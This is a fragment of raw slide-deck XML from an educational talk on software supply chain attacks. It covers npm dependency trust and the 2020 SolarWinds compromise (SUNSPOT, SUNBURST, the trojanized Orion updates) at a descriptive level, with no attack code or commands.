              <a:buClr>
                <a:srgbClr val="4F4F4F"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Principal Engineer / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Paysafe</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1098643" y="3429000"/>
            <a:ext cx="9483600" cy="7745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BG" dirty="0"/>
              <a:t>Supply Chain Attacks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FD7C94B2-E725-F7F7-B6FE-949692123D9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="137160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Let me ask you two questions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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8651FB67-B593-DD8F-26D8-21D5A83ADBD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="214884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many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" b="1" dirty="0" err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devs</a:t>
            </a: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ran </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" b="1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npm install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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today?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{383252D2-7359-D46B-2700-64BBC94C7CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="3429000"/>
            <a:ext cx="11175752" cy="1945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 how many of all know who wrote the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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1,200 packages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="11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just pulled onto your machine?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DC5A4D8F-14F8-0848-E071-8FD54B2C2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5F23631-B857-28E8-05CE-5F5D5DEBDC1B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is a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supply chain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attack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C287344-B68B-6EB4-E54B-D8DB4A8A012A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ATTACKER NEVER KNOCKS ON YOUR FRONT DOOR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="def">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8730B7DE-8381-1FC4-B695-15A041857EB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1801368"/>
            <a:ext cx="6766560" cy="3749040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 219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88E33217-824A-EC8C-C5AB-A694A9F9BE74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2011680"/>
            <a:ext cx="6126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They compromise something you already trust</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/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8E085A96-F771-D053-8CA4-D95759ADAA91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2697480"/>
            <a:ext cx="621792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vendor, a library, a build system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="155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 update mechanism or a CI/CD tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="155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attacker compromises it once…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" algn="l">
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"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…and the trusted source itself ships the malicious code — signed and “legitimate” — to thousands of customers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="pull">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC31D41A-F9B8-836C-A447-A0FFE0D614B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7635240" y="1801368"/>
            <a:ext cx="3977640" cy="3749040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 219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FE67DAAF-7540-CC60-FCD8-706272C9CB58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7863840" y="21031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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty="0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CFFB3678-7AAF-FA0C-87AF-0EC2A71C118E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7955280" y="3017520"/>
            <a:ext cx="3383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Attack one.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Infect thousands.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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victim does the distribution for you.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4536123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1F3CB266-1FE7-768E-B404-193CD124A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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22D8E87B-A0B0-B310-0E99-937228952847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scale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is the whole point</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/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CB1F7CB2-389F-F6F3-D8BC-F43D3D1F2A42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COMPROMISED NODE — THOUSANDS OF AFFECTED LEAVES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04A8206B-6029-C23A-4012-64B2F8EDD475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992624" y="1828800"/>
            <a:ext cx="2194560" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14286"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6B6B"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="127000" dist="38100" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="05081A">
                <a:alpha val="50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DE6D279F-804B-D355-EC97-A6624F6D9FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992624" y="182880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Compromised vendor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0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22BDEA1C-CA9A-9EA2-4D3E-4141EFD61EB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2468880"/>
            <a:ext cx="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5" name="Shape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BF9209F-F842-0DD7-0F57-B7E52AF80930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2468880"/>
            <a:ext cx="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6" name="Shape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C2EE69F-CB13-9FCB-9A94-588CBBCE03BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2468880"/>
            <a:ext cx="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7" name="Shape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA6EC766-80AE-B85C-00B5-E23C5D8AD212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2468880"/>
            <a:ext cx="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8" name="Shape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BDED574-A041-CDBD-1F52-F1C4E040BAAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2468880"/>
            <a:ext cx="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19" name="Shape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AA440A8-7AC6-9D17-8DF7-147175C3D5D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2468880"/>
            <a:ext cx="128016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0" name="Shape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3903EB4-FF99-3392-5994-B9DA2B7445D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2468880"/>
            <a:ext cx="256032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1" name="Shape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24B917BD-1BDD-632C-9BC8-F72352E9F755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2468880"/>
            <a:ext cx="384048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2" name="Shape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D48F923-282E-3E9A-87A3-564A5CAD0585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2468880"/>
            <a:ext cx="5120640" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="FFFFFF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BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9634C579-7AD3-F33B-E814-598686D3EAD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76809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4" name="Shape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CFE29BE-138E-CC7E-38B8-AE58C4F92070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204825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5" name="Shape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93E67105-1F45-D371-B238-935BA045C9C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332841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AAC6F8B0-6B82-513C-D5C7-975CDA6A79AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460857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7" name="Shape 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1FD6172-AC03-82A8-200A-5086C0C736CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5888736" y="4297680"/>
            <a:ext cx="402336" cy="402336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8" name="Shape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A33713A8-C2B8-7E63-361E-46CBAEA295F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716889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9" name="Shape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32EDC619-6C04-D5A1-D90E-CB59C86AED73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844905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0" name="Shape 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E454D60-5706-FA05-AC41-6EAB6353A62E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972921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1" name="Shape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B771613-5B6F-EF65-326B-64A4727677FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11009376" y="4297680"/>
            <a:ext cx="402336" cy="402336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2" name="Text 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8DDDAD-FCFE-7F70-CC40-5C045A832981}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3803904" y="48920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…and thousands more</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9CBFA1-546F-E042-CBBD-04BC02354869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="539496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~18,000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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customers installed the SolarWinds backdoor from a single build-server compromise.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0558336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B52CBE04-A98B-D487-72FF-C504C79FE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A74DBF3-B3A0-9376-86ED-6A7A200FDA50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SolarWinds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2020 — the textbook case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64B8682-EBD4-1435-68BC-674D338FC406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ATTRIBUTED TO RUSSIAN FOREIGN INTELLIGENCE (SVR / APT29)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="sw">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A84A3FF9-0543-A9D2-41FC-23610057E8F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1801368"/>
            <a:ext cx="11064240" cy="3749040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 219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0C84CBAC-17DE-2B7E-EE37-B8ABC617D8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2057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9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attackers broke into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="19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build environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="19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of SolarWinds — not a running server, the factory that compiles the product.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/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340B964C-B525-08C1-AFEB-22DE8A29B88A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960120" y="3127248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2130229F-292D-7B8C-4769-4E478D44AC1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280160" y="3017520"/>
            <a:ext cx="9966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SUNSPOT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an implant that swapped source code during compilation. In Git, everything still looked clean.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B96B6938-8EFB-FFD9-3279-82C6B292FFEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960120" y="3968496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2" name="Text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1990B52-6A38-0EB6-AFDF-485D6A32732B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280160" y="3858768"/>
            <a:ext cx="9966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Orion updates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(2019.4 HF5 → 2020.2.1) shipped trojanized — and signed with SolarWinds’ legitimate certificate.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4104903-8074-AAA5-0328-5148B9180929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960120" y="480974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B7C984FE-BE7A-4788-2256-58B1374E39B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280160" y="4700016"/>
            <a:ext cx="9966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SUNBURST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the backdoor ~18,000 customers installed through a routine, trusted update.</a:t>
            </a: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1133401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9E122E4A-735F-89FE-FB66-B2B757F74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274D3ED-AF5E-B1E4-A5B7-914FEE176BDE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How SUNBURST stayed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invisible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CA50EA0-23F5-6C6C-5A23-38871327147E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PATIENT, QUIET, AND DRESSED UP AS NORMAL TRAFFIC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="st0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9730469C-465F-12CF-584E-117EE988CC95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1892808"/>
            <a:ext cx="2615184" cy="3017520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3147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0A62D4E-25A0-19D5-A0D0-2A5009C514F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="2167128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9FED2D7-FEA1-C417-851D-1171220F4C9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="2167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D77E27C-9848-4A4A-D7CF-B3C7A029D704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="27614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Wait</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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7DF4C12F-C563-7C1A-C57B-54300EEC69A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="3264408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backdoor sat dormant for ~2 weeks before doing anything.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="st1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A2F78BF-2BE1-EB5B-3ACE-2D3A33AEE999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3355848" y="1892808"/>
            <a:ext cx="2615184" cy="3017520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3147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8EF9C006-13B1-2206-642F-92442A3B6FD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611880" y="2167128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012FB37-3B8F-88EF-31F5-00BC7DE8A887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611880" y="2167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D24E5B3-E94F-9340-E8C0-FB7203ACC769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611880" y="27614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Blend in</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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5AE552B-D384-FD14-206A-7B16F1F5F32C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611880" y="3264408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mimicked legitimate Orion API traffic — nothing looked out of place.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="st2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB3F508F-232B-D0C9-6FA6-826EBEC475A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6163056" y="1892808"/>
            <a:ext cx="2615184" cy="3017520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3147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5D6C00BF-F219-2589-ABCC-1E7FF023E872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419088" y="2167128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BDB0DBEF-C2E6-BA25-C569-99D14AC2419F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419088" y="2167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4021B2B2-2EAE-22C8-9F48-EA83A68D7F55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
